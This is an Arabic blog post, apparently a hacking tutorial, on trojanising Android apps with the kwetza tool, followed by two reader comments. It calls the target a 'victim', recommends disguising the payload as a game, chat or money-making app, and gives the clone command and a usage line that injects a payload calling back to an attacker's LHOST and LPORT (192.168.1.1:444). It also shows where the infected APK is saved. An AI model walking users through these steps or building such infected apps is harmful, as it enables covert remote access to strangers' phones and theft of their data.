من أهم الطرق المستخدمة في إختراق هواتف أندرويد، أن يتم تثبيت ملف apk ( تطبيق ) على جهاز الضحية، ويلجئ الهاكرز
لإخفاء هذه التطبيقات ضمن تطبيقات أخرى (الهندسة الإجتماعية)، مثلا تطبيقات ألعاب أو دردشه أو ربح المال وغيرها ..
ومن الأدوات التي تساعدهم في القيام بدمج التطبيقات وإخفائها (الهندسة الإجتماعية) أدة kwetza.
تثبيت أداة kwetza
git clone https://github.com/sensepost/kwetza.git
طريقة إستخدام kwetza
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
nameOfTheApkToInfect.apk: الملف أو اسم التطبيق الذي تريد عمل حقن له (تطبيق ألعاب...).
root@kali:~/Desktop/kwetza# python kwetza.py testhack.apk 192.168.1.1 444 yes
يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
/root/Desktop/kwetza/testhack/dist/testhack.apk
جميع الشروحات والادوات تقتصر فقط لمعالجات 64بت....رغم ان هنالك هواتف متقدمه في الاداء ومعالجاتها 32بت على سبيل المثال نوت4 العالمي n910c اعتقد بانه من الوجب ان بكون معالجه 64بت .وهذا يدل على غباء سامسونج عند طرح نوعيات من الاجهزه.وايضا s3 العالمي الذي عمل ضجه كبيره في السوق عند نزوله للسوق...وكان ايضا غلطه كبيره بان كان حجم الذاكره العشوائيه البسيط .فما هذا الغباء الصناعي لست ادري.
ردحذفهل الطريقه تنفع مع صوره
ردحذف